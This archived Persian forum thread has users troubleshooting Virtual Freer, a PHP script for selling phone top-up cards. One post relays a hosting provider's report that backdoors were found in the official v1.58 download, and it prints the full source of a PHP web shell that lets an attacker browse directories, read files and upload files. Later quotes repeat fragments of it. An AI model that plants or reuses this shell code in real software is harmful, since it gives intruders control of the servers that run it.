ورود

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : اسکریپت رایگان فروش کارت‌های شارژ و محصولات مجازی Virtual Freer

صفحه ها : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19]

us12
October 2nd, 2015, 11:41
ممنون: ولی من دنبال یه اسکریپت فقط پرداخت نیستم، میخوام یه سایتی شبیه سایت زیر راه بندازم با امکانات این سایت یا بهتر:
modernlike.ir

به نظر میرسد این سایت اسکریپت اختصاصی داشته باشد .

شما هم اگر مورد مشابه نیاز دارید باید به یک برنامه نویس بگید تا برای شما درست کند و بعید میدونم اسکریپت رایگان ( یا غیر رایگان ) با این امکانات برای فروش فالو وجود داشته باشد .

refigh
October 3rd, 2015, 23:50
سلام
من دو هفته قبل این ماژول نصب کردم مشکلی نداشت
ولی الان دوباره همونو خواستم نصب کنم
اپلود نمیشه سرور گیر میده میگه ویروس داره
قضیه چیه ؟28327

sos666
October 4th, 2015, 10:54
سلام
من دو هفته قبل این ماژول نصب کردم مشکلی نداشت
ولی الان دوباره همونو خواستم نصب کنم
اپلود نمیشه سرور گیر میده میگه ویروس داره
قضیه چیه ؟28327

ویروس داره دیگه دوست عزیز!
احتمالا تازه آنتی شلر یا آنتی ویروس نصب کردن روی سرور!
از یک ماژول سالم استفاده کنید!

refigh
October 4th, 2015, 23:03
ویروس داره دیگه دوست عزیز!
احتمالا تازه آنتی شلر یا آنتی ویروس نصب کردن روی سرور!
از یک ماژول سالم استفاده کنید!

جالبه از سایت اصلی فریر میگیرم ولی ویروس داره

bloodthirstyb
October 10th, 2015, 18:11
دوستان من آخرین ورژن این اسکریپت رو از سایت اصلی انلود کردم ولی موقع آپلود ، هاست ارور میده که ویروس داره..کسی میتونه یه نسخه سالم از این اسکریپت به من بده؟ چند تا نسخه دیگه هم دانلود کردم ولی بعد از نصب توی صفحه پر از ارور میشد

- - - Updated - - -

کسی نمیتونه کمک کنه تا من بتونم این اسکریپت رو آپلود کنم؟

MOJTABA005
October 10th, 2015, 18:15
درود
در خدمتیم در صورتی که نیاز دارید به صورت رایگان براتون نصب میکنیم

bloodthirstyb
October 11th, 2015, 16:44
درود
در خدمتیم در صورتی که نیاز دارید به صورت رایگان براتون نصب میکنیم
پیام خصوصی ارسال شد..ممنون میشم جواب بدید

virus2009
October 14th, 2015, 14:57
سلام؛ خسته نباشید

من می خوام پس از فروش یک محصول مجازی کد فعال سازی پس از خرید ساخته بشه و به کاربر نشون داده بشه، نه اینکه از قبل ساخته شده و در دیتابیس قرار گرفته باشه.

چی پیشنهاد می کنید ؟

us12
October 14th, 2015, 17:48
سلام؛ خسته نباشید

من می خوام پس از فروش یک محصول مجازی کد فعال سازی پس از خرید ساخته بشه و به کاربر نشون داده بشه، نه اینکه از قبل ساخته شده و در دیتابیس قرار گرفته باشه.

چی پیشنهاد می کنید ؟

برای آنتی ویروس نیاز دارید ؟

این ماژول را بررسی کنید

http://www.softiran.org/view-item/82/virtual-freer-active-code.html

ArTaBaZ-2010
November 9th, 2015, 13:07
سلام دوستان
من بعد از پرداخت وجه و هنگام برگشت به سایت با خطای زیر مواجه شدم :

کد 43 : قبلا درخواست verify داده شده است.
در موقع پرداخت مشکلی به وجود آمد.

مشکل چیه ؟

majidamiri
November 9th, 2015, 14:04
سلام دوستان
من بعد از پرداخت وجه و هنگام برگشت به سایت با خطای زیر مواجه شدم :

کد 43 : قبلا درخواست verify داده شده است.
در موقع پرداخت مشکلی به وجود آمد.

مشکل چیه ؟

سلام ... از چه درگاهي استفاده ميكنيد ؟؟

Sent from my iPhone using Tapatalk

ArTaBaZ-2010
November 9th, 2015, 20:04
سلام ... از چه درگاهي استفاده ميكنيد ؟؟

از درگاه ملت

majidamiri
November 9th, 2015, 20:11
از درگاه ملت

جديداً بانك ملت تغييراتي توي درگاهش بوجود آورده كه احتمالاً بايد منتظر يه آپديت جديد براي پلاگينش باشيد ... اگرم تا اون موقع نميتونيد صبر كنيد ميتونيد به سايت بانك ملت بريد ، مستندات جديد رو دريافت كنيد و مطابق اونا پلاگين فعلي تون رو فيكس كنيد !!

گروه مایان
November 9th, 2015, 23:30
خرید شارژ با این روش منسوخ شده

yebordi
November 11th, 2015, 03:47
سلام
اساتید محترم سوالی در رابطه با مشکل امنیتی صفحه لاگین مدیریت که در اخبار خود سایت freer نیز اومده داشتم
من از ورژن قدیمی استفاده می کردم و متوجه شدم که بعضی از کارت هام بدون فروخته شدن استفاده شدند و مشخصه که به سیستم نفوذ شده
ورژن قدیم رو به روز کردم
پسورد ادمین رو تعویض کردم
کلیه کارت های فروخته نشده رو هم تعویض کردم
حال می خواهم بدونم که در حال حاظر می شه رو امنیتش حساب کرد ؟

us12
November 11th, 2015, 09:51
سلام
اساتید محترم سوالی در رابطه با مشکل امنیتی صفحه لاگین مدیریت که در اخبار خود سایت freer نیز اومده داشتم
من از ورژن قدیمی استفاده می کردم و متوجه شدم که بعضی از کارت هام بدون فروخته شدن استفاده شدند و مشخصه که به سیستم نفوذ شده
ورژن قدیم رو به روز کردم
پسورد ادمین رو تعویض کردم
کلیه کارت های فروخته نشده رو هم تعویض کردم
حال می خواهم بدونم که در حال حاظر می شه رو امنیتش حساب کرد ؟

اینجا را بررسی کنید

http://www.softiran.org/view-item/97/virtual-freer-safe-pack.html

HyperLink
November 12th, 2015, 20:22
با سلام خدمت اساتید محترم
بنده حدوداً ده روزی هست که ورژن 1.58 و نصب کردم
از دیروز تا الان به مشکل خوردم
بعد از انتخاب سفارش و زدن کلید پرداخت جهت اتصال به درگاه بانک ، با پیام " سفارشی با این مشخصات یافت نشد " مواجه میشدم/در کنترل پنل هم امکان اضافه کردن پین شارژ هم وحود نداشت .(تمام مراحل بدون مشکل انجام میشد ، اما در عمل پین اضافه نمیشد )
متأسفانه به راهکاری برای این مشکل نرسیدم ، به همین خاطر فایل MySQL رو پاک کردم و برنامه رو مجدداً نصب کردم . اما از این زمان به بعد ، حتی وارد بخش مدیریتی هم نمیتونم بشم و پیام نام کاربری یا کلمه عبور اشتباه است میده
در صورتی که بصورت پیش فرض هر دو admin هست . حتی پسورد رو به غیر از admin هم تغییر دادم . اما باز هم مشکل پابرجاست
حتی این مراحل را با ورژن 1.57 هم تست کردم ، اما فرقی نمیکنه
لطفاً اگه کسی اطلاعی در این زمینه داره ، راهنماییم کنه/متشکرم

yebordi
November 13th, 2015, 04:49
سلام دوستان
اساتید من یک مشکل دارم
Freer رو آپدیت کردم به ورژن 1.58
مشکل اینجا بود که خریدار به راحتی خرید رو انجام می داد ولی بعد از بازگشت به سایت هیچ محصولی به نمایش در نمیاد و وقتی صفحه رو refresh کنی نیز اعلام می شه که این خرید قبلا انجام شده است ... وجه از حساب مشتری کم می شه و تو قسمت پرداخت نیز پرداخت موفقیت آمیز ثبت شده ولی چیزی برای مشتری به نمایش در نمیومد
ورژن رو برگرداندم به بک آپی که قبلا از نصب داشتم مشکل حل شد ولی ورژنم خیلی قدیمی است و مربوط به چند 2 سال پیشه
کسی می دونم مشکل از کجاست ؟ مشکل از ورژن 1.58 بود ؟
کسی فایل مخصوص آپگرید به ورژن 1.57 داره ؟
منطورم نصب از اول نیست بلکه آپگرید به ورژن 1.57

kyko
November 14th, 2015, 07:14
بعضی از مشتری ها بعد از پرداخت با خطای (سفارش قبلا پرداخت شده است) مواجه میشند
دلیلش چی هست

majidamiri
November 16th, 2015, 20:45
با سلام خدمت اساتید محترم
بنده حدوداً ده روزی هست که ورژن 1.58 و نصب کردم
از دیروز تا الان به مشکل خوردم
بعد از انتخاب سفارش و زدن کلید پرداخت جهت اتصال به درگاه بانک ، با پیام " سفارشی با این مشخصات یافت نشد " مواجه میشدم/در کنترل پنل هم امکان اضافه کردن پین شارژ هم وحود نداشت .(تمام مراحل بدون مشکل انجام میشد ، اما در عمل پین اضافه نمیشد )
متأسفانه به راهکاری برای این مشکل نرسیدم ، به همین خاطر فایل MySQL رو پاک کردم و برنامه رو مجدداً نصب کردم . اما از این زمان به بعد ، حتی وارد بخش مدیریتی هم نمیتونم بشم و پیام نام کاربری یا کلمه عبور اشتباه است میده
در صورتی که بصورت پیش فرض هر دو admin هست . حتی پسورد رو به غیر از admin هم تغییر دادم . اما باز هم مشکل پابرجاست
حتی این مراحل را با ورژن 1.57 هم تست کردم ، اما فرقی نمیکنه
لطفاً اگه کسی اطلاعی در این زمینه داره ، راهنماییم کنه/متشکرم

سلام ...
وقتي ميخوايد از MySQL پسورد مديريت رو عوض كنيد ، Function رو روي MD5 قرار بديد.

yebordi
November 19th, 2015, 02:27
بعضی از مشتری ها بعد از پرداخت با خطای (سفارش قبلا پرداخت شده است) مواجه میشند
دلیلش چی هست

سلام
دوست عزیز ابتدا از فایل های درون پوشه public html یه بک آپ بگیرید
سپس از روی database بک آپ بگیرید
حال ابتدا فایل upgerade.sql مربوط به آپگرید به ورژن 1.58 رو طبق آموزش سایت Freer درون database ایمپورت کنید
نهایتا کل محتویات پوشه public html رو پاک کنید و نسخه نصبی 1.58 رو به پوشه public html انتقال داده و با همان اطلاعات دیتابیس قبلی نصب کنید
ورژن 1.58 که نصب شد یکبار دیگه فایل های مربوط به درگاه رو به پوشه پلاگین رو انتقال بدید و اطلاعات درگاه رو درون تنظیمات مدیریت وارد کنید
مشکل به صورت ریشه ای حل می شود
حتما موارد امنیتی توصیه شده در این سایت رو هم بعد از اوکی شدن ورژن 1.58 انجام بدید تا خیالتون راحت باشه
شخصا کلی تست انجام دادم تا مشکل به همین صورت که عرض کردم حل شد

yasaman_hy2005
November 28th, 2015, 13:34
سلام من فایل فریر اپلود کردم این خطا رو موقع نصب میده؟!!!

Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258

- - - Updated - - -

سلام دوستان
من وقتی میخوام فریر رو نصب کم با ین خطا مواجه میشم علت چیه؟
ممنون میشم راهنمایی بفرمایید.
Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in /var/www/vhosts/mydomain.ir/httpdocs/freer/install/index.php on line 258

Alirezayb
November 30th, 2015, 01:15
سلام خدمت اساتید

من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :

سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد

فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم

منتظر حل مشکل هستم

با سلام خدمت شما

طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:

virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php

جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.

این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت نمایید.

چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم)

طراح هم در جواب بهم گفتن که برم از سایت و دوباره دانلود کنم

و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده

سلام مجدد

این رو هم بخونید لطفا

با سلام خدمت شما

در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل

virtual_freer_v1.58/include/libs/smarty/plugins/function.engine.php

مشاهده شد. این کد نیز یک کد بکدور برای آپلود فایل دلخواه می باشد.

کد شناسایی شده به شرح زیر است:

============

$user='16d1a558492edec3ed7775be2942c1cd';
$pass='16d1a558492edec3ed7775be2942c1cd';

if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"]) !=$pass) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"eshghi");
echo "<h1>Authorization Required.</h1>";
die();
}else{
error_reporting(0);
set_magic_quotes_runtime(0);
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";
}else{$s="/";
}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}$form='<form action="'.$_SERVER['PHP_SELF'].'" method=post>';
echo '<center><textarea cols=90 rows=20>';
if($_GET['cme']){opendir($_GET['cme']);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
<input type=submit value=Read!></form>
<form action="'.$me.'" method=post enctype=multipart/form-data>
Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>
<input type=submit value=Send></form><br>';

if(isset ($_POST['cme'])){
$myFile = $_POST['cme'];
$fh = fopen($myFile, 'r');
if($theData = fread($fh, filesize($myFile))){
fclose($fh);
echo '<textarea clos=90 rows=20>'.$theData.'</textarea>';
}
else{
echo "File Could Not Found!!";
}}}

?>

============

با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام شده کد مورد اشاره در بالا شناسایی نشده بود). با توجه به این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود خواهد داشت.

این رو هم فرستادم اما خبری نشد

از دوستان کسی هست که بتونه این مشکل رو برطرف بکنه ؟

doctorportable
November 30th, 2015, 09:39
سلام
کدی که اشاره کردید رو منم تو سایت خودم مشاهده کردم. البته تو فایل اپلودی در سور فریر امروز اصلاح شده!!!
فریر نه از طرف نویسنده و نه از جانب نفوز هکر ها قابل اطمینان نیست.

us12
November 30th, 2015, 09:44
سلام خدمت اساتید

من ورژن 1.58 که آخرین ورژن هست رو از سایت دانلود کردم , اما موقع انتقال با ارور تروجان مواجه شدم و وقتی که مدیر سایت گفتم این مطلب رو برام فرستاد که من این متن رو برای طراح اسکریت ایمیل کردم و گفتم :

سلام
خسته نباشید
من اومدم اسکریپت رو به هاستم انتقال بدم که دیدم ارور تروجان میگیره
با مدیریت هاست در تماس بودم که این مطلب رو در مورد بکدور و... برام ارسال کرد که عینا براتون ارسال میکنم.
فایل هم ضمیمه شد

فکر کردم قبل از پرسیدن و مطرح کردن تو وب هاستینگ تاک با شما صحبت کنم

منتظر حل مشکل هستم

با سلام خدمت شما

طی بررسی فایل آرشیو ارسالی کدهای بکدور در ۳ فایل زیر در این آرشیو شناسایی شد:

virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_templateparser.php
virtual_freer_v1.58/include/libs/smarty/sysplugins/smarty_internal_configfileparser.php
virtual_freer_v1.58/include/libs/nusoap.php

جزییات دقیق کدهای شناسایی شده در فایل پیوست تیکت قابل مشاهده می باشد.

این کدها امکان اجرای کدهای ریموت و یا آپلود شل را بر روی سایت میزبان فراهم می کنند. در صورتیکه این فایل را از سایت مرجع و اصلی طراح اسکریپت دریافت ننموده اید پیشنهاد می شود از استفاده از این آرشیو نصب بر روی سرویس خود پرهیز نمایید و به جای آن فایل آرشیو را از سایت اصلی دریافت نمایید.

چنانچه فایل را از سایت اصلی دریافت نموده اید، خواهشمند است حتما موضوع را به طراح اسکریپت/مدیر سایت مورد نظر اطلاع داده و از ایشان بخواهید حتما این مشکل را پیگیری و چگونگی اینجکت کدها بکدور به آرشیو نصب ارایه شده را پیگیری و بررسی های امنیتی دقیق در این مورد را پیگیری کنند. همچنین حتما کد اسکریپت را به صورت کامل بررسی و از عدم وجود کدهای بکدور دیگر در آرشیو ارایه شده اطمینان حاصل نموده و پس از پاکسازی کامل و رفع مشکل امنیتی آرشیو نصب جدید را در اختیار شما قرار دهند.( فایل آرشیو تیکت حاوی کدهای مخرب شناسایی شده است شما متیوانید این فایل را جهت پیگیری در اختیار طراح/مدیر سایتی که آرشیو را از آن سایت دریافت نموده اید قرار دهید)
و این فایل رو dmz هم برام فرستاد که بدم (آپلود کردم)

و باز به مدیر هاست گفتم و ایشون باز یه ارور دیگه گرفتن و من باز برای طراح اسکریپت فرستادم که اصلاح کنن , اما 3 روزه که خبری نشده

سلام مجدد

این رو هم بخونید لطفا

با سلام خدمت شما

در فایل آرشیو جدید ارسالی کدهای مخرب شناسایی شده حذف شده اند. اما یک مورد کد بکدور دیگر که قبلا شناسایی نشده بود در فایل

============

if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"]) !=$pass) {
die();
}else{
error_reporting(0);
}else{$s="/";
}$ad=$_REQUEST['ad'];
}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}else{echo $df.$lf;};
echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'>
<input type=submit value=Go></form>'.$form.'Read File : <input name=cme size=50 value=id>
Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'>

$myFile = $_POST['cme'];
fclose($fh);
}
else{
}}}

?>

============

با توجه به این اطلاعات ظاهرا کد آرشیو به صورت کامل توسط طراح اسکریپت بررسی و پاکسازی نشده است. اطمینان کامل از عدم وجود کدهای مخرب تنها با بررسی دقیق کدهای تمامی اسکریپتها امکانپذیر می باشد در غیر اینصورت تضمینی برای شناسایی تمامی کدهای مخرب وجود ندارد(کما اینکه در بررسی اولیه انجام شده کد مورد اشاره در بالا شناسایی نشده بود). با توجه به این موضوع پیشنهاد می شود تا بررسی کامل فایلهای آرشیو نصب اسکریپت که ممکن است چند روز به زمان نیاز داشته باشد از نصب این اسکریپت بر روی سرویس خود پرهیز نمایید. البته در صورت نگهداری آرشیو های جداگانه از فایلها و نگهداری هش تمامی فایلهای بسته در یک محل امن و یا استفاده از ابزازهای مدیریت سوروس برنامه هایی مانند
git
برای مدیریت و نگهداری سورس برنامه توسط طراح اسکریپت، به راحتی امکان شناسایی چنین نفوذها و دستکاری هایی و اصلاح سریع آنها توسط طراح وجود خواهد داشت.

1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟

2- اگر شما از این پکیچ استفاده کنید :
دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.

3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :
http://www.smarty.net/download
کنید و از آن استفاده کنید .

فقط حتما بعد از به روز رسانی اسمارتی محتوایات فولدر templates_c را حذف کنید .

doctorportable
November 30th, 2015, 09:49
1- فریر را از کجا دانلود کردید ؟ از سایت اصلی فریر freer.ir یا سایت های اسکریپت رایگان ؟

دسترسی اجرا شل در تمامی این فولدر ها قطع میشود و اگر شل هم روی هاست شما باشد کسی نمیتواند از آن استفاده کند.

3- اسمارتی یک کتابخانه است ، شما میتواند کل فولدر اسمارتی را از روی هاست حذف کنید و آخرین ورژن را از این سایت دانلود :

بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .

تشکر بابت راهنمایی

us12
November 30th, 2015, 18:27
بنده فریر ور از سایت freer.ir دانلود کردم . ورژن 1.58 مربوط به چند روز پیش
امروز که مجدد دانلود کردم فایلهایی که اشاره کرده بودند اصلاح شده بودند .

تشکر بابت راهنمایی

البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!

به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .

-----------
ورژن 1.57 با آخرین تمهیدات امنیتی :

http://www.softiran.org/article/57/virtual-freer-version-1.57.html

kyko
November 30th, 2015, 22:18
البته فریر که الان برای دانلود قرار داده باز هم شل هایی در فایل install.php دارد !!

به زودی همان نسخه قبلی 1.57 با امنیت تضمین شده را لینک میدهم تا کاربران دانلود کنند .

-----------

ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:

us12
November 30th, 2015, 23:00
ورژن 1.57 مشکلاتی داره و مهمترینش عدم تحویل بعد از پرداخت بود
شما که وارد هستید مشکلات ورژن 1.58 را شناسایی و به سازنده اسکریپت اطلاع بدید :53:

من اطلاع دادم ولی معلوم نیست چرا هر فایلی که آپلود می کند یک شل داره !

بازم به نظر من برای کارهای عادی ورژن 1.57 بهتر از 1.58 است و هر کس با ورژن قبلی مشکل دارد باید موردی بررسی شود تا علت اصلی ( که به احتمال زیاد به هاست و ورژن php مربوط میشود ) پیدا شود .

اگر هم وقت داشته باشم ورژن 1.58 را ایمن شده لینک قرار میدهم ...

ناگفته نماید لینکی که گذاشتم با PHP ورژن 5.4 مشکلی ندارد و می توانید ورژن پی اچ پی را بالا ببرید .

Alirezayb
November 30th, 2015, 23:34

از خود سایت اصلی دانلود کرده بودم

- - - Updated - - -

سلام مجدد

این رو هم بخونید لطفا

با سلام خدمت شما

============

die();
}else{
error_reporting(0);
}else{$s="/";
}$ad=$_REQUEST['ad'];
';}else{$lf=$lf.$f.'
';}}closedir($hr);
}else{echo $df.$lf;};

$myFile = $_POST['cme'];
fclose($fh);
}
else{
}}}

?>

============

git

در مورد بخش دوم که جواب نداده بودن هم ایشون جواب ایمیل من و ریپورت باگ رو اینچنینی دادن :

سلام

فایل گزارش شده را کامل پاک کنید.
//

در حال برنامه ریزی برای نسخه دوم فریر هستیم و پشتیبانی و رفع مشکلات نسخه جاری را به حداقل رساندیم و فقط مشکلاتی که گزارش می‌شود را رفع می کنیم. اگر فایل مشکل دار دیگری یافتید اطلاع دهید.

kyko
December 2nd, 2015, 21:19
نسخه 1.58 را الان دانود کردم با نمونه 2 روز قبل فرق کرده
اینایی که میگند باگ داره دوباره چک کنند ببینند مشکلاتش رو رفع شده یا نه

Alirezayb
December 2nd, 2015, 22:45

-----------

از دوستان کسی این نسخه رو تست کرده ؟

- - - Updated - - -

نسخه 1.58 را الان دانود کردم با نمونه 2 روز قبل فرق کرده
اینایی که میگند باگ داره دوباره چک کنند ببینند مشکلاتش رو رفع شده یا نه

رفتم دوباره که دانلود کنم اما نود32 اجازه نمیده که سایت رو باز کنم , جالبه

Access denied

Access to the web page was blocked. Show URL (http://freer.ir/#)

The web page is on the list of websites with potentially dangerous content.

kyko
December 2nd, 2015, 23:38
رفتم دوباره که دانلود کنم اما نود32 اجازه نمیده که سایت رو باز کنم , جالبه

Access denied

Access to the web page was blocked. Show URL (http://freer.ir/#)

The web page is on the list of websites with potentially dangerous content.

برای منم اینطور شد الان!!
اون نسخه 1.57 سافت ایران هم تست کردم خوب بود
ولی به نظرم از 1.58 استفاده کنید

payam358
December 4th, 2015, 19:21
ایا امکان نصب روی سرور اختصاصی با سیستم عامل ویندوز وجود دارد؟
ما تمام فایل هامونو واسه سایت فیلم از طریق iis لینک دادیم و الان متاسفانه به مشکل خوردیم اکثر سیستم های وی ای پی فقط قابل ارایه برای لینوکس هستن و ما هم نمیتونیم بعد از جمع اوری این همه اطلاعات سیستم عامل رو عوض کنیم
اگر کسی راهی سراغ داره ممنون میشیم برای فروش اکانت سیستمی رو معرفی کنه که قابلیت نصب روی ویندوز رو داشته باشه

us12
December 4th, 2015, 19:28
ایا امکان نصب روی سرور اختصاصی با سیستم عامل ویندوز وجود دارد؟
ما تمام فایل هامونو واسه سایت فیلم از طریق iis لینک دادیم و الان متاسفانه به مشکل خوردیم اکثر سیستم های وی ای پی فقط قابل ارایه برای لینوکس هستن و ما هم نمیتونیم بعد از جمع اوری این همه اطلاعات سیستم عامل رو عوض کنیم
اگر کسی راهی سراغ داره ممنون میشیم برای فروش اکانت سیستمی رو معرفی کنه که قابلیت نصب روی ویندوز رو داشته باشه

فریر روی ویندوز هم قابل نصب و کانفیگ است .

برای وی آی پی هم می توانید از این ماژول استفاده کنید

http://www.softiran.org/view-item/77/virtual-freer-vip-download.html

حتی با این ماژول می توانید فریر را روی یک هاست دیگر نصب کنید و مدیریت وی آی پی چند سرور را همزمان انجام دهید . ( حتما نباید فریر روی همان سرور ها باشد !)

masi892
December 6th, 2015, 17:46
سلام دوستان
پس از خرید پیغام Could not instantiate mail function نمایش داده می شود و ایمیلی برای خریدار ارسال نمی شود، ممنون میشم راهنمایی کنید مشکل از کجاست.
مرسی

29102

us12
December 6th, 2015, 19:19
سلام دوستان
پس از خرید پیغام Could not instantiate mail function نمایش داده می شود و ایمیلی برای خریدار ارسال نمی شود، ممنون میشم راهنمایی کنید مشکل از کجاست.
مرسی

29102

2 حالت داره ، یا هاست شما php mail را مصدود کرده ، یا در تنظیمات ماژول ایمیل ارسال کننده را وارد نکردید یا ایمیل خارج از هاست وارد کردید ( مثلا ایمیل یاهو گذاشتید )

masi892
December 6th, 2015, 23:25
ممنون از پاسخ شما
به هاستینگ تیکت دادم. گفتن مشکلی در ارسال ایمیل از هاست نیست.
دو مورد دیگر هم چک شده و موردی نداره.
چیز دیگری به ذهنتون نمیرسه؟

m.lover
December 7th, 2015, 22:12
دوستان من نسخه 1.58 رو دانلود کردم و توی هسات کپی کردم اما موقعی که آدرس پوشه install رو میزنم ارور میده در صورتی که در یک هاست دیگر این مشکل وجود نداشت میشه راهنماییم کنید
اینم آدرس سایت
www.pardakht2.ir

ksi_xi_nt
December 10th, 2015, 14:44
با سلام و خسته نباشید ، وقتی به عنوان مثال یک شارژ 2000 تومانی را به تعداد 2 عدد انتخاب می کنیم که جمع مبلغ می شود 4000 تومان ، تا اینجا درست. ، حالا اگه بیایم روی شارژ مستقیم کلیک کنیم و مثلا وارد کنیم مبلغ 4000 تومان همچنان این مبلغ در اون تعداد 2تا ضرب میشود. ، باید چکار کرد وقتی شارژ مستقیم انتخاب میشه اون تعداد در نظر گرفته نشه؟؟؟

m.lover
December 10th, 2015, 17:02
دوستان پس از پرداخت اگه ناموفق بود موقع یازگشت به سایت پیغام درست نشون میده ولی اگه موفق بود وقتی به سایت خودم برمیگرده یه صفحه سفید نشون میده و حتی ایمیل هم به طرف ارسال نمیکنه

bia2mob
December 11th, 2015, 20:50
دوستان ورژن جدید 1.58توسط اکثر هاست ها هنگام اپلود ارور میده که فایل حاوی تروجان هستش و سایتشون هم توسط انتی ویروس نود 32 بلاک شده
کسی می تونه نسخه اخری رو انالیز کنه و اطلاع بده با تشکر

greatamir
December 15th, 2015, 22:50
با سلام
از دوستان یک سوال داشتم
virtual freer رو نصب کردم ولی وقتی محصولات رو اضافه می کنم در سایت اصلیم قابلیت انتخاب کردن و کلیک شدن نداره (یعنی مثلا اگه یکی بخواد گزینه شارژ 2000 تومانی انتخاب کنه نمیتونه و قابل کلیک شدن نیست)
ممنون میشم راهنمایی کنین

fax_modem
December 22nd, 2015, 20:03
با سلام هنگام نصب با پیغام زیر روبرو میشم

